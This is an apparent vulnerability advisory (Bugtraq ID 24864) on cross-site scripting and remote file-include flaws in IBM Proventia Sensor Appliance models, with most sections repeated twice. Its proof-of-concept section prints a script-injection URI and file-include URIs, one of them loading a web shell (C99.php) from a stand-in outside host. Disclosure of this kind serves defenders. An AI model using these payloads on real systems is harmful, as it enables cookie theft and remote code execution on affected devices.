IBM Proventia Sensor Appliance Multiple Input Validation Vulnerabilities
BID:24864
Info
IBM Proventia Sensor Appliance Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 24864 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 11 2007 12:00AM |
| Updated: | Jul 11 2007 10:37PM |
| Credit: | Alex Hernandez is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
IBM Proventia Sensor Appliance GX5108 IBM Proventia Sensor Appliance GX5008 |
| Not Vulnerable: | |
Discussion
IBM Proventia Sensor Appliance Multiple Input Validation Vulnerabilities
The IBM Proventia Sensor Appliance is prone to multiple input-validation vulnerabilities, including multiple remote file-include issues and a cross-site scripting issue.
An attacker can exploit these issues to steal cookie-based authentication credentials, view files, and to execute arbitrary server-side script code on an affected device in the context of the webserver process. Other attacks are also possible.
IBM Proventia Sensor Appliance CX5108 and GX5008 are vulnerable.
The IBM Proventia Sensor Appliance is prone to multiple input-validation vulnerabilities, including multiple remote file-include issues and a cross-site scripting issue.
An attacker can exploit these issues to steal cookie-based authentication credentials, view files, and to execute arbitrary server-side script code on an affected device in the context of the webserver process. Other attacks are also possible.
IBM Proventia Sensor Appliance CX5108 and GX5008 are vulnerable.
Exploit / POC
IBM Proventia Sensor Appliance Multiple Input Validation Vulnerabilities
To exploit a cross-site scripting issue:
An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.
The following proof-of-concept URI is available:
https://www.example.com/alert.php?reminder=-->//"><script>alert(/XSS_vulnerability_proventia_s0x by Alex Hernandez/);</script>
To exploit a remote file-include issue:
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?title=http://www.example2.com/C99.php?archive.php
https://www.example.com/main.php?page=https://www.example2.com
To exploit a cross-site scripting issue:
An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.
The following proof-of-concept URI is available:
https://www.example.com/alert.php?reminder=-->//"><script>alert(/XSS_vulnerability_proventia_s0x by Alex Hernandez/);</script>
To exploit a remote file-include issue:
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?title=http://www.example2.com/C99.php?archive.php
https://www.example.com/main.php?page=https://www.example2.com
Solution / Fix
IBM Proventia Sensor Appliance Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
IBM Proventia Sensor Appliance Multiple Input Validation Vulnerabilities
References:
References:
- Having Fun with Sensor Appliance Proventia GX5108 and GX5008 Insecurities (Alex Hernandez)
- IBM Proventia Homepage (IBM)